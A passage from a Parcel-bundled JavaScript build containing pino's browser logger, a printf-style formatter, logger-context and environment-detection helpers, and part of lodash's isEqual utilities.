    if (logger._serialize) $03ceb28a240053b3$var$applySerializers(args, logger._serialize, logger.serializers, logger._stdErrSerialize);
    const argsCloned = args.slice();
    let msg = argsCloned[0];
    const o = {};
    if (ts) o.time = ts;
    o.level = $03ceb28a240053b3$var$pino.levels.values[level];
    let lvl = (logger._childLevel | 0) + 1;
    if (lvl < 1) lvl = 1;
    // deliberate, catching objects, arrays
    if (msg !== null && typeof msg === "object") {
        while(lvl-- && typeof argsCloned[0] === "object")Object.assign(o, argsCloned.shift());
        msg = argsCloned.length ? $7h4xj(argsCloned.shift(), argsCloned) : undefined;
    } else if (typeof msg === "string") msg = $7h4xj(argsCloned.shift(), argsCloned);
    if (msg !== undefined) o.msg = msg;
    return o;
}
function $03ceb28a240053b3$var$applySerializers(args, serialize, serializers, stdErrSerialize) {
    for(const i in args){
        if (stdErrSerialize && args[i] instanceof Error) args[i] = $03ceb28a240053b3$var$pino.stdSerializers.err(args[i]);
        else if (typeof args[i] === "object" && !Array.isArray(args[i])) {
            for(const k in args[i])if (serialize && serialize.indexOf(k) > -1 && k in serializers) args[i][k] = serializers[k](args[i][k]);
        }
    }
}
function $03ceb28a240053b3$var$bind(parent, bindings, level) {
    return function() {
        const args = new Array(1 + arguments.length);
        args[0] = bindings;
        for(var i = 1; i < args.length; i++)args[i] = arguments[i - 1];
        return parent[level].apply(this, args);
    };
}
function $03ceb28a240053b3$var$transmit(logger, opts, args) {
    const send = opts.send;
    const ts = opts.ts;
    const methodLevel = opts.methodLevel;
    const methodValue = opts.methodValue;
    const val = opts.val;
    const bindings = logger._logEvent.bindings;
    $03ceb28a240053b3$var$applySerializers(args, logger._serialize || Object.keys(logger.serializers), logger.serializers, logger._stdErrSerialize === undefined ? true : logger._stdErrSerialize);
    logger._logEvent.ts = ts;
    logger._logEvent.messages = args.filter(function(arg) {
        // bindings can only be objects, so reference equality check via indexOf is fine
        return bindings.indexOf(arg) === -1;
    });
    logger._logEvent.level.label = methodLevel;
    logger._logEvent.level.value = methodValue;
    send(methodLevel, logger._logEvent, val);
    logger._logEvent = $03ceb28a240053b3$var$createLogEventShape(bindings);
}
function $03ceb28a240053b3$var$createLogEventShape(bindings) {
    return {
        ts: 0,
        messages: [],
        bindings: bindings || [],
        level: {
            label: "",
            value: 0
        }
    };
}
function $03ceb28a240053b3$var$asErrValue(err) {
    const obj = {
        type: err.constructor.name,
        msg: err.message,
        stack: err.stack
    };
    for(const key in err)if (obj[key] === undefined) obj[key] = err[key];
    return obj;
}
function $03ceb28a240053b3$var$getTimeFunction(opts) {
    if (typeof opts.timestamp === "function") return opts.timestamp;
    if (opts.timestamp === false) return $03ceb28a240053b3$var$nullTime;
    return $03ceb28a240053b3$var$epochTime;
}
function $03ceb28a240053b3$var$mock() {
    return {};
}
function $03ceb28a240053b3$var$passthrough(a) {
    return a;
}
function $03ceb28a240053b3$var$noop() {}
function $03ceb28a240053b3$var$nullTime() {
    return false;
}
function $03ceb28a240053b3$var$epochTime() {
    return Date.now();
}
function $03ceb28a240053b3$var$unixTime() {
    return Math.round(Date.now() / 1000.0);
}
function $03ceb28a240053b3$var$isoTime() {
    return new Date(Date.now()).toISOString();
} // using Date.now() for testability
/* eslint-disable */ /* istanbul ignore next */ function $03ceb28a240053b3$var$pfGlobalThisOrFallback() {
    function defd(o) {
        return typeof o !== "undefined" && o;
    }
    try {
        if (typeof globalThis !== "undefined") return globalThis;
        Object.defineProperty(Object.prototype, "globalThis", {
            get: function() {
                delete Object.prototype.globalThis;
                return this.globalThis = this;
            },
            configurable: true
        });
        return globalThis;
    } catch (e) {
        return defd(self) || defd(window) || defd(this) || {};
    }
} /* eslint-enable */ 

});
parcelRequire.register("7h4xj", function(module, exports) {
"use strict";
function $54bda3badc858a5e$var$tryStringify(o) {
    try {
        return JSON.stringify(o);
    } catch (e) {
        return '"[Circular]"';
    }
}
module.exports = $54bda3badc858a5e$var$format;
function $54bda3badc858a5e$var$format(f, args, opts) {
    var ss = opts && opts.stringify || $54bda3badc858a5e$var$tryStringify;
    var offset = 1;
    if (typeof f === "object" && f !== null) {
        var len = args.length + offset;
        if (len === 1) return f;
        var objects = new Array(len);
        objects[0] = ss(f);
        for(var index = 1; index < len; index++)objects[index] = ss(args[index]);
        return objects.join(" ");
    }
    if (typeof f !== "string") return f;
    var argLen = args.length;
    if (argLen === 0) return f;
    var str = "";
    var a = 1 - offset;
    var lastPos = -1;
    var flen = f && f.length || 0;
    for(var i = 0; i < flen;){
        if (f.charCodeAt(i) === 37 && i + 1 < flen) {
            lastPos = lastPos > -1 ? lastPos : 0;
            switch(f.charCodeAt(i + 1)){
                case 100:
                case 102:
                    if (a >= argLen) break;
                    if (args[a] == null) break;
                    if (lastPos < i) str += f.slice(lastPos, i);
                    str += Number(args[a]);
                    lastPos = i + 2;
                    i++;
                    break;
                case 105:
                    if (a >= argLen) break;
                    if (args[a] == null) break;
                    if (lastPos < i) str += f.slice(lastPos, i);
                    str += Math.floor(Number(args[a]));
                    lastPos = i + 2;
                    i++;
                    break;
                case 79:
                case 111:
                case 106:
                    if (a >= argLen) break;
                    if (args[a] === undefined) break;
                    if (lastPos < i) str += f.slice(lastPos, i);
                    var type = typeof args[a];
                    if (type === "string") {
                        str += "'" + args[a] + "'";
                        lastPos = i + 2;
                        i++;
                        break;
                    }
                    if (type === "function") {
                        str += args[a].name || "<anonymous>";
                        lastPos = i + 2;
                        i++;
                        break;
                    }
                    str += ss(args[a]);
                    lastPos = i + 2;
                    i++;
                    break;
                case 115:
                    if (a >= argLen) break;
                    if (lastPos < i) str += f.slice(lastPos, i);
                    str += String(args[a]);
                    lastPos = i + 2;
                    i++;
                    break;
                case 37:
                    if (lastPos < i) str += f.slice(lastPos, i);
                    str += "%";
                    lastPos = i + 2;
                    i++;
                    a--;
                    break;
            }
            ++a;
        }
        ++i;
    }
    if (lastPos === -1) return f;
    else if (lastPos < flen) str += f.slice(lastPos);
    return str;
}

});


parcelRequire.register("glyO2", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.PINO_CUSTOM_CONTEXT_KEY = module.exports.PINO_LOGGER_DEFAULTS = void 0;
module.exports.PINO_LOGGER_DEFAULTS = {
    level: "info"
};
module.exports.PINO_CUSTOM_CONTEXT_KEY = "custom_context";

});

parcelRequire.register("cyyD4", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.generateChildLogger = module.exports.formatChildLoggerContext = module.exports.getLoggerContext = module.exports.setBrowserLoggerContext = module.exports.getBrowserLoggerContext = module.exports.getDefaultLoggerOptions = void 0;

var $glyO2 = parcelRequire("glyO2");
function $924385a22f0d1fa4$var$getDefaultLoggerOptions(opts) {
    return Object.assign(Object.assign({}, opts), {
        level: (opts === null || opts === void 0 ? void 0 : opts.level) || $glyO2.PINO_LOGGER_DEFAULTS.level
    });
}
module.exports.getDefaultLoggerOptions = $924385a22f0d1fa4$var$getDefaultLoggerOptions;
function $924385a22f0d1fa4$var$getBrowserLoggerContext(logger, customContextKey = $glyO2.PINO_CUSTOM_CONTEXT_KEY) {
    return logger[customContextKey] || "";
}
module.exports.getBrowserLoggerContext = $924385a22f0d1fa4$var$getBrowserLoggerContext;
function $924385a22f0d1fa4$var$setBrowserLoggerContext(logger, context, customContextKey = $glyO2.PINO_CUSTOM_CONTEXT_KEY) {
    logger[customContextKey] = context;
    return logger;
}
module.exports.setBrowserLoggerContext = $924385a22f0d1fa4$var$setBrowserLoggerContext;
function $924385a22f0d1fa4$var$getLoggerContext(logger, customContextKey = $glyO2.PINO_CUSTOM_CONTEXT_KEY) {
    let context = "";
    if (typeof logger.bindings === "undefined") context = $924385a22f0d1fa4$var$getBrowserLoggerContext(logger, customContextKey);
    else context = logger.bindings().context || "";
    return context;
}
module.exports.getLoggerContext = $924385a22f0d1fa4$var$getLoggerContext;
function $924385a22f0d1fa4$var$formatChildLoggerContext(logger, childContext, customContextKey = $glyO2.PINO_CUSTOM_CONTEXT_KEY) {
    const parentContext = $924385a22f0d1fa4$var$getLoggerContext(logger, customContextKey);
    const context = parentContext.trim() ? `${parentContext}/${childContext}` : childContext;
    return context;
}
module.exports.formatChildLoggerContext = $924385a22f0d1fa4$var$formatChildLoggerContext;
function $924385a22f0d1fa4$var$generateChildLogger(logger, childContext, customContextKey = $glyO2.PINO_CUSTOM_CONTEXT_KEY) {
    const context = $924385a22f0d1fa4$var$formatChildLoggerContext(logger, childContext, customContextKey);
    const child = logger.child({
        context: context
    });
    return $924385a22f0d1fa4$var$setBrowserLoggerContext(child, context, customContextKey);
}
module.exports.generateChildLogger = $924385a22f0d1fa4$var$generateChildLogger;

});

parcelRequire.register("ljFVp", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.isBrowserCryptoAvailable = module.exports.getSubtleCrypto = module.exports.getBrowerCrypto = void 0;
function $f84be4b966947ef2$var$getBrowerCrypto() {
    return ($parcel$global === null || $parcel$global === void 0 ? void 0 : $parcel$global.crypto) || ($parcel$global === null || $parcel$global === void 0 ? void 0 : $parcel$global.msCrypto) || {};
}
module.exports.getBrowerCrypto = $f84be4b966947ef2$var$getBrowerCrypto;
function $f84be4b966947ef2$var$getSubtleCrypto() {
    const browserCrypto = $f84be4b966947ef2$var$getBrowerCrypto();
    return browserCrypto.subtle || browserCrypto.webkitSubtle;
}
module.exports.getSubtleCrypto = $f84be4b966947ef2$var$getSubtleCrypto;
function $f84be4b966947ef2$var$isBrowserCryptoAvailable() {
    return !!$f84be4b966947ef2$var$getBrowerCrypto() && !!$f84be4b966947ef2$var$getSubtleCrypto();
}
module.exports.isBrowserCryptoAvailable = $f84be4b966947ef2$var$isBrowserCryptoAvailable;

});

parcelRequire.register("5vmD7", function(module, exports) {

var $hPtJY = parcelRequire("hPtJY");
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.isBrowser = module.exports.isNode = module.exports.isReactNative = void 0;
function $402166cfd1e26574$var$isReactNative() {
    return typeof document === "undefined" && typeof navigator !== "undefined" && navigator.product === "ReactNative";
}
module.exports.isReactNative = $402166cfd1e26574$var$isReactNative;
function $402166cfd1e26574$var$isNode() {
    return typeof $hPtJY !== "undefined" && typeof $hPtJY.versions !== "undefined" && typeof $hPtJY.versions.node !== "undefined";
}
module.exports.isNode = $402166cfd1e26574$var$isNode;
function $402166cfd1e26574$var$isBrowser() {
    return !$402166cfd1e26574$var$isReactNative() && !$402166cfd1e26574$var$isNode();
}
module.exports.isBrowser = $402166cfd1e26574$var$isBrowser;

});

parcelRequire.register("jlahN", function(module, exports) {
"use strict";
module.exports = function() {
    throw new Error("ws does not work in the browser. Browser clients must use the native WebSocket object");
};

});

parcelRequire.register("6cqMT", function(module, exports) {
/**
 * Lodash (Custom Build) <https://lodash.com/>
 * Build: `lodash modularize exports="npm" -o ./`
 * Copyright JS Foundation and other contributors <https://js.foundation/>
 * Released under MIT license <https://lodash.com/license>
 * Based on Underscore.js 1.8.3 <http://underscorejs.org/LICENSE>
 * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors
 */ /** Used as the size to enable large array optimizations. */ var LARGE_ARRAY_SIZE = 200;
/** Used to stand-in for `undefined` hash values. */ var HASH_UNDEFINED = "__lodash_hash_undefined__";
/** Used to compose bitmasks for value comparisons. */ var COMPARE_PARTIAL_FLAG = 1, COMPARE_UNORDERED_FLAG = 2;
/** Used as references for various `Number` constants. */ var MAX_SAFE_INTEGER = 9007199254740991;
/** `Object#toString` result references. */ var argsTag = "[object Arguments]", arrayTag = "[object Array]", asyncTag = "[object AsyncFunction]", boolTag = "[object Boolean]", dateTag = "[object Date]", errorTag = "[object Error]", funcTag = "[object Function]", genTag = "[object GeneratorFunction]", mapTag = "[object Map]", numberTag = "[object Number]", nullTag = "[object Null]", objectTag = "[object Object]", promiseTag = "[object Promise]", proxyTag = "[object Proxy]", regexpTag = "[object RegExp]", setTag = "[object Set]", stringTag = "[object String]", symbolTag = "[object Symbol]", undefinedTag = "[object Undefined]", weakMapTag = "[object WeakMap]";
var arrayBufferTag = "[object ArrayBuffer]", dataViewTag = "[object DataView]", float32Tag = "[object Float32Array]", float64Tag = "[object Float64Array]", int8Tag = "[object Int8Array]", int16Tag = "[object Int16Array]", int32Tag = "[object Int32Array]", uint8Tag = "[object Uint8Array]", uint8ClampedTag = "[object Uint8ClampedArray]", uint16Tag = "[object Uint16Array]", uint32Tag = "[object Uint32Array]";
/**
 * Used to match `RegExp`
 * [syntax characters](http://ecma-international.org/ecma-262/7.0/#sec-patterns).
 */ var reRegExpChar = /[\\^$.*+?()[\]{}|]/g;
/** Used to detect host constructors (Safari). */ var reIsHostCtor = /^\[object .+?Constructor\]$/;
/** Used to detect unsigned integer values. */ var reIsUint = /^(?:0|[1-9]\d*)$/;
/** Used to identify `toStringTag` values of typed arrays. */ var typedArrayTags = {};
typedArrayTags[float32Tag] = typedArrayTags[float64Tag] = typedArrayTags[int8Tag] = typedArrayTags[int16Tag] = typedArrayTags[int32Tag] = typedArrayTags[uint8Tag] = typedArrayTags[uint8ClampedTag] = typedArrayTags[uint16Tag] = typedArrayTags[uint32Tag] = true;
typedArrayTags[argsTag] = typedArrayTags[arrayTag] = typedArrayTags[arrayBufferTag] = typedArrayTags[boolTag] = typedArrayTags[dataViewTag] = typedArrayTags[dateTag] = typedArrayTags[errorTag] = typedArrayTags[funcTag] = typedArrayTags[mapTag] = typedArrayTags[numberTag] = typedArrayTags[objectTag] = typedArrayTags[regexpTag] = typedArrayTags[setTag] = typedArrayTags[stringTag] = typedArrayTags[weakMapTag] = false;
/** Detect free variable `global` from Node.js. */ var freeGlobal = typeof $parcel$global == "object" && $parcel$global && $parcel$global.Object === Object && $parcel$global;
/** Detect free variable `self`. */ var freeSelf = typeof self == "object" && self && self.Object === Object && self;
/** Used as a reference to the global object. */ var root = freeGlobal || freeSelf || Function("return this")();
/** Detect free variable `exports`. */ var freeExports = exports && !exports.nodeType && exports;
/** Detect free variable `module`. */ var freeModule = freeExports && true && module && !module.nodeType && module;
/** Detect the popular CommonJS extension `module.exports`. */ var moduleExports = freeModule && freeModule.exports === freeExports;
/** Detect free variable `process` from Node.js. */ var freeProcess = moduleExports && freeGlobal.process;
/** Used to access faster Node.js helpers. */ var nodeUtil = function() {
    try {
        return freeProcess && freeProcess.binding && freeProcess.binding("util");
    } catch (e) {}
}();
/* Node.js helper references. */ var nodeIsTypedArray = nodeUtil && nodeUtil.isTypedArray;
/**
 * A specialized version of `_.filter` for arrays without support for
 * iteratee shorthands.
 *
 * @private
 * @param {Array} [array] The array to iterate over.
 * @param {Function} predicate The function invoked per iteration.
 * @returns {Array} Returns the new filtered array.
 */ function arrayFilter(array, predicate) {
    var index = -1, length = array == null ? 0 : array.length, resIndex = 0, result = [];
    while(++index < length){
        var value = array[index];
        if (predicate(value, index, array)) result[resIndex++] = value;
    }
    return result;
}
/**
 * Appends the elements of `values` to `array`.
 *
 * @private
 * @param {Array} array The array to modify.
 * @param {Array} values The values to append.
 * @returns {Array} Returns `array`.
 */ function arrayPush(array, values) {
    var index = -1, length = values.length, offset = array.length;
    while(++index < length)array[offset + index] = values[index];
    return array;
}
/**
 * A specialized version of `_.some` for arrays without support for iteratee
 * shorthands.
 *
 * @private
 * @param {Array} [array] The array to iterate over.
 * @param {Function} predicate The function invoked per iteration.
 * @returns {boolean} Returns `true` if any element passes the predicate check,
 *  else `false`.
 */ function arraySome(array, predicate) {
    var index = -1, length = array == null ? 0 : array.length;
    while(++index < length){
        if (predicate(array[index], index, array)) return true;
    }
    return false;
}
/**
 * The base implementation of `_.times` without support for iteratee shorthands
 * or max array length checks.
 *
 * @private
 * @param {number} n The number of times to invoke `iteratee`.
 * @param {Function} iteratee The function invoked per iteration.
 * @returns {Array} Returns the array of results.
 */ function baseTimes(n, iteratee) {
    var index = -1, result = Array(n);
    while(++index < n)result[index] = iteratee(index);
    return result;
}
/**
 * The base implementation of `_.unary` without support for storing metadata.
 *
 * @private
 * @param {Function} func The function to cap arguments for.
 * @returns {Function} Returns the new capped function.
 */ function baseUnary(func) {
    return function(value) {
        return func(value);
    };
}
/**
 * Checks if a `cache` value for `key` exists.
 *
 * @private
 * @param {Object} cache The cache to query.
 * @param {string} key The key of the entry to check.
 * @returns {boolean} Returns `true` if an entry for `key` exists, else `false`.
 */ function cacheHas(cache, key) {
    return cache.has(key);
}
/**
 * Gets the value at `key` of `object`.
 *
 * @private
 * @param {Object} [object] The object to query.
 * @param {string} key The key of the property to get.
 * @returns {*} Returns the property value.
 */ function getValue(object, key) {
    return object == null ? undefined : object[key];
}
/**
 * Converts `map` to its key-value pairs.
 *
 * @private
 * @param {Object} map The map to convert.
 * @returns {Array} Returns the key-value pairs.
 */ function mapToArray(map) {
    var index = -1, result = Array(map.size);
    map.forEach(function(value, key) {
        result[++index] = [
            key,
            value
        ];
    });
    return result;
}
/**
 * Creates a unary function that invokes `func` with its argument transformed.
 *
 * @private
 * @param {Function} func The function to wrap.
 * @param {Function} transform The argument transform.
 * @returns {Function} Returns the new function.
 */ function overArg(func, transform) {
    return function(arg) {
        return func(transform(arg));
    };
}
/**
 * Converts `set` to an array of its values.
 *
 * @private
 * @param {Object} set The set to convert.
 * @returns {Array} Returns the values.
 */ function setToArray(set) {
    var index = -1, result = Array(set.size);
    set.forEach(function(value) {
        result[++index] = value;
    });
    return result;
}
/** Used for built-in method references. */ var arrayProto = Array.prototype, funcProto = Function.prototype, objectProto = Object.prototype;
/** Used to detect overreaching core-js shims. */ var coreJsData = root["__core-js_shared__"];
/** Used to resolve the decompiled source of functions. */ var funcToString = funcProto.toString;
/** Used to check objects for own properties. */ var hasOwnProperty = objectProto.hasOwnProperty;
/** Used to detect methods masquerading as native. */ var maskSrcKey = function() {
    var uid = /[^.]+$/.exec(coreJsData && coreJsData.keys && coreJsData.keys.IE_PROTO || "");
    return uid ? "Symbol(src)_1." + uid : "";
}();
/**
 * Used to resolve the
 * [`toStringTag`](http://ecma-international.org/ecma-262/7.0/#sec-object.prototype.tostring)
 * of values.
 */ var nativeObjectToString = objectProto.toString;
/** Used to detect if a method is native. */ var reIsNative = RegExp("^" + funcToString.call(hasOwnProperty).replace(reRegExpChar, "\\$&").replace(/hasOwnProperty|(function).*?(?=\\\()| for .+?(?=\\\])/g, "$1.*?") + "$");
/** Built-in value references. */ var Buffer = moduleExports ? root.Buffer : undefined, Symbol = root.Symbol, Uint8Array = root.Uint8Array, propertyIsEnumerable = objectProto.propertyIsEnumerable, splice = arrayProto.splice, symToStringTag = Symbol ? Symbol.toStringTag : undefined;
/* Built-in method references for those with the same name as other `lodash` methods. */ var nativeGetSymbols = Object.getOwnPropertySymbols, nativeIsBuffer = Buffer ? Buffer.isBuffer : undefined, nativeKeys = overArg(Object.keys, Object);
/* Built-in method references that are verified to be native. */ var DataView = getNative(root, "DataView"), Map = getNative(root, "Map"), Promise = getNative(root, "Promise"), Set = getNative(root, "Set"), WeakMap = getNative(root, "WeakMap"), nativeCreate = getNative(Object, "create");
/** Used to detect maps, sets, and weakmaps. */ var dataViewCtorString = toSource(DataView), mapCtorString = toSource(Map), promiseCtorString = toSource(Promise), setCtorString = toSource(Set), weakMapCtorString = toSource(WeakMap);
/** Used to convert symbols to primitives and strings. */ var symbolProto = Symbol ? Symbol.prototype : undefined, symbolValueOf = symbolProto ? symbolProto.valueOf : undefined;
/**
 * Creates a hash object.
 *
 * @private
 * @constructor
 * @param {Array} [entries] The key-value pairs to cache.
 */ function Hash(entries) {
    var index = -1, length = entries == null ? 0 : entries.length;
    this.clear();
    while(++index < length){
        var entry = entries[index];
        this.set(entry[0], entry[1]);
    }
}
/**
 * Removes all key-value entries from the hash.
 *
 * @private
 * @name clear
 * @memberOf Hash
 */ function hashClear() {
    this.__data__ = nativeCreate ? nativeCreate(null) : {};
    this.size = 0;
}
/**
 * Removes `key` and its value from the hash.
 *
 * @private
 * @name delete
 * @memberOf Hash
 * @param {Object} hash The hash to modify.
 * @param {string} key The key of the value to remove.
 * @returns {boolean} Returns `true` if the entry was removed, else `false`.
 */ function hashDelete(key) {
    var result = this.has(key) && delete this.__data__[key];
    this.size -= result ? 1 : 0;
    return result;
}
/**
 * Gets the hash value for `key`.
 *
 * @private
 * @name get
 * @memberOf Hash
 * @param {string} key The key of the value to get.
 * @returns {*} Returns the entry value.
 */ function hashGet(key) {
    var data = this.__data__;
    if (nativeCreate) {
        var result = data[key];
        return result === HASH_UNDEFINED ? undefined : result;
    }
    return hasOwnProperty.call(data, key) ? data[key] : undefined;
}
/**
 * Checks if a hash value for `key` exists.
 *
 * @private
 * @name has
 * @memberOf Hash
 * @param {string} key The key of the entry to check.
 * @returns {boolean} Returns `true` if an entry for `key` exists, else `false`.
 */ function hashHas(key) {
    var data = this.__data__;
    return nativeCreate ? data[key] !== undefined : hasOwnProperty.call(data, key);
}
/**
 * Sets the hash `key` to `value`.
 *
 * @private
 * @name set
 * @memberOf Hash
 * @param {string} key The key of the value to set.
 * @param {*} value The value to set.
 * @returns {Object} Returns the hash instance.
 */ function hashSet(key, value) {
    var data = this.__data__;
    this.size += this.has(key) ? 0 : 1;
    data[key] = nativeCreate && value === undefined ? HASH_UNDEFINED : value;
    return this;
}
// Add methods to `Hash`.
Hash.prototype.clear = hashClear;
Hash.prototype["delete"] = hashDelete;
Hash.prototype.get = hashGet;
Hash.prototype.has = hashHas;
Hash.prototype.set = hashSet;
/**
 * Creates an list cache object.
 *
 * @private
 * @constructor
 * @param {Array} [entries] The key-value pairs to cache.
 */ function ListCache(entries) {
    var index = -1, length = entries == null ? 0 : entries.length;
    this.clear();
    while(++index < length){
        var entry = entries[index];
        this.set(entry[0], entry[1]);
    }
}
/**
 * Removes all key-value entries from the list cache.
 *
 * @private
 * @name clear
 * @memberOf ListCache
 */ function listCacheClear() {
    this.__data__ = [];
    this.size = 0;
}
/**
 * Removes `key` and its value from the list cache.
 *
 * @private
 * @name delete
 * @memberOf ListCache
 * @param {string} key The key of the value to remove.
 * @returns {boolean} Returns `true` if the entry was removed, else `false`.
 */ function listCacheDelete(key) {
    var data = this.__data__, index = assocIndexOf(data, key);
    if (index < 0) return false;
    var lastIndex = data.length - 1;
    if (index == lastIndex) data.pop();
    else splice.call(data, index, 1);
    --this.size;
    return true;
}
/**
 * Gets the list cache value for `key`.
 *
 * @private
 * @name get
 * @memberOf ListCache
 * @param {string} key The key of the value to get.
 * @returns {*} Returns the entry value.
 */ function listCacheGet(key) {
    var data = this.__data__, index = assocIndexOf(data, key);
    return index < 0 ? undefined : data[index][1];
}
/**
 * Checks if a list cache value for `key` exists.
 *
 * @private
 * @name has
 * @memberOf ListCache
 * @param {string} key The key of the entry to check.
 * @returns {boolean} Returns `true` if an entry for `key` exists, else `false`.
 */ function listCacheHas(key) {
    return assocIndexOf(this.__data__, key) > -1;
}
/**
 * Sets the list cache `key` to `value`.
 *
 * @private
 * @name set
 * @memberOf ListCache
 * @param {string} key The key of the value to set.
 * @param {*} value The value to set.
 * @returns {Object} Returns the list cache instance.
 */ function listCacheSet(key, value) {
    var data = this.__data__, index = assocIndexOf(data, key);
    if (index < 0) {
        ++this.size;
        data.push([
            key,
            value
        ]);
    } else data[index][1] = value;
    return this;
}
// Add methods to `ListCache`.
ListCache.prototype.clear = listCacheClear;
ListCache.prototype["delete"] = listCacheDelete;
ListCache.prototype.get = listCacheGet;
ListCache.prototype.has = listCacheHas;
ListCache.prototype.set = listCacheSet;
/**
 * Creates a map cache object to store key-value pairs.
 *
 * @private
 * @constructor
 * @param {Array} [entries] The key-value pairs to cache.
 */ function MapCache(entries) {
    var index = -1, length = entries == null ? 0 : entries.length;
    this.clear();
    while(++index < length){
        var entry = entries[index];
        this.set(entry[0], entry[1]);
    }
}
/**
 * Removes all key-value entries from the map.
 *
 * @private
 * @name clear
 * @memberOf MapCache
 */ function mapCacheClear() {
    this.size = 0;
    this.__data__ = {
        "hash": new Hash,
        "map": new (Map || ListCache),
        "string": new Hash
    };
}
/**
 * Removes `key` and its value from the map.
 *
 * @private
 * @name delete
 * @memberOf MapCache
 * @param {string} key The key of the value to remove.
 * @returns {boolean} Returns `true` if the entry was removed, else `false`.
 */ function mapCacheDelete(key) {
    var result = getMapData(this, key)["delete"](key);
    this.size -= result ? 1 : 0;
    return result;
}
/**
 * Gets the map value for `key`.
 *
 * @private
 * @name get
 * @memberOf MapCache
 * @param {string} key The key of the value to get.
 * @returns {*} Returns the entry value.
 */ function mapCacheGet(key) {
    return getMapData(this, key).get(key);
}
/**
 * Checks if a map value for `key` exists.
 *
 * @private
 * @name has
 * @memberOf MapCache
 * @param {string} key The key of the entry to check.
 * @returns {boolean} Returns `true` if an entry for `key` exists, else `false`.
 */ function mapCacheHas(key) {
    return getMapData(this, key).has(key);
}
/**
 * Sets the map `key` to `value`.
 *
 * @private
 * @name set
 * @memberOf MapCache
 * @param {string} key The key of the value to set.
 * @param {*} value The value to set.
 * @returns {Object} Returns the map cache instance.
 */ function mapCacheSet(key, value) {
    var data = getMapData(this, key), size = data.size;
    data.set(key, value);
    this.size += data.size == size ? 0 : 1;
    return this;
}
// Add methods to `MapCache`.
MapCache.prototype.clear = mapCacheClear;
MapCache.prototype["delete"] = mapCacheDelete;
MapCache.prototype.get = mapCacheGet;
MapCache.prototype.has = mapCacheHas;
MapCache.prototype.set = mapCacheSet;
/**
 *
 * Creates an array cache object to store unique values.
 *
 * @private
 * @constructor
 * @param {Array} [values] The values to cache.
 */ function SetCache(values) {
    var index = -1, length = values == null ? 0 : values.length;
    this.__data__ = new MapCache;
    while(++index < length)this.add(values[index]);
}
/**
 * Adds `value` to the array cache.
 *
 * @private
 * @name add
 * @memberOf SetCache
 * @alias push
 * @param {*} value The value to cache.
 * @returns {Object} Returns the cache instance.
 */ function setCacheAdd(value) {
    this.__data__.set(value, HASH_UNDEFINED);
    return this;
}
/**
 * Checks if `value` is in the array cache.
 *
 * @private
 * @name has
 * @memberOf SetCache
 * @param {*} value The value to search for.
 * @returns {number} Returns `true` if `value` is found, else `false`.
 */ function setCacheHas(value) {
    return this.__data__.has(value);
}
// Add methods to `SetCache`.
SetCache.prototype.add = SetCache.prototype.push = setCacheAdd;
SetCache.prototype.has = setCacheHas;
/**
 * Creates a stack cache object to store key-value pairs.
 *
 * @private
 * @constructor
 * @param {Array} [entries] The key-value pairs to cache.
 */ function Stack(entries) {
    var data = this.__data__ = new ListCache(entries);
    this.size = data.size;
}
/**
 * Removes all key-value entries from the stack.
 *
 * @private
 * @name clear
 * @memberOf Stack
 */ function stackClear() {
    this.__data__ = new ListCache;
    this.size = 0;
}
/**
 * Removes `key` and its value from the stack.
 *
 * @private
 * @name delete
 * @memberOf Stack
 * @param {string} key The key of the value to remove.
 * @returns {boolean} Returns `true` if the entry was removed, else `false`.
 */ function stackDelete(key) {
    var data = this.__data__, result = data["delete"](key);
    this.size = data.size;
    return result;
}
/**
 * Gets the stack value for `key`.
 *
 * @private
 * @name get
 * @memberOf Stack
 * @param {string} key The key of the value to get.
 * @returns {*} Returns the entry value.
 */ function stackGet(key) {
    return this.__data__.get(key);
}
/**
 * Checks if a stack value for `key` exists.
 *
 * @private
 * @name has
 * @memberOf Stack
 * @param {string} key The key of the entry to check.
 * @returns {boolean} Returns `true` if an entry for `key` exists, else `false`.
 */ function stackHas(key) {
    return this.__data__.has(key);
}
/**
 * Sets the stack `key` to `value`.
 *
 * @private
 * @name set
 * @memberOf Stack
 * @param {string} key The key of the value to set.
 * @param {*} value The value to set.
 * @returns {Object} Returns the stack cache instance.
 */ function stackSet(key, value) {
    var data = this.__data__;
    if (data instanceof ListCache) {
        var pairs = data.__data__;
        if (!Map || pairs.length < LARGE_ARRAY_SIZE - 1) {
            pairs.push([
                key,
                value
            ]);
            this.size = ++data.size;
            return this;
        }
        data = this.__data__ = new MapCache(pairs);
    }
    data.set(key, value);
    this.size = data.size;
    return this;
}
// Add methods to `Stack`.
Stack.prototype.clear = stackClear;
Stack.prototype["delete"] = stackDelete;
Stack.prototype.get = stackGet;
Stack.prototype.has = stackHas;
Stack.prototype.set = stackSet;
/**
 * Creates an array of the enumerable property names of the array-like `value`.
 *
 * @private
 * @param {*} value The value to query.
 * @param {boolean} inherited Specify returning inherited property names.
 * @returns {Array} Returns the array of property names.
 */ function arrayLikeKeys(value, inherited) {
    var isArr = isArray(value), isArg = !isArr && isArguments(value), isBuff = !isArr && !isArg && isBuffer(value), isType = !isArr && !isArg && !isBuff && isTypedArray(value), skipIndexes = isArr || isArg || isBuff || isType, result = skipIndexes ? baseTimes(value.length, String) : [], length = result.length;
    for(var key in value)if ((inherited || hasOwnProperty.call(value, key)) && !(skipIndexes && // Safari 9 has enumerable `arguments.length` in strict mode.
    (key == "length" || // Node.js 0.10 has enumerable non-index properties on buffers.
    isBuff && (key == "offset" || key == "parent") || // PhantomJS 2 has enumerable non-index properties on typed arrays.
    isType && (key == "buffer" || key == "byteLength" || key == "byteOffset") || // Skip index properties.
    isIndex(key, length)))) result.push(key);
    return result;
}
/**
 * Gets the index at which the `key` is found in `array` of key-value pairs.
 *
 * @private
 * @param {Array} array The array to inspect.
 * @param {*} key The key to search for.
 * @returns {number} Returns the index of the matched value, else `-1`.
 */ function assocIndexOf(array, key) {
    var length = array.length;
    while(length--){
        if (eq(array[length][0], key)) return length;
    }
    return -1;
}
/**
 * The base implementation of `getAllKeys` and `getAllKeysIn` which uses
 * `keysFunc` and `symbolsFunc` to get the enumerable property names and
 * symbols of `object`.
 *
 * @private
 * @param {Object} object The object to query.
 * @param {Function} keysFunc The function to get the keys of `object`.
 * @param {Function} symbolsFunc The function to get the symbols of `object`.
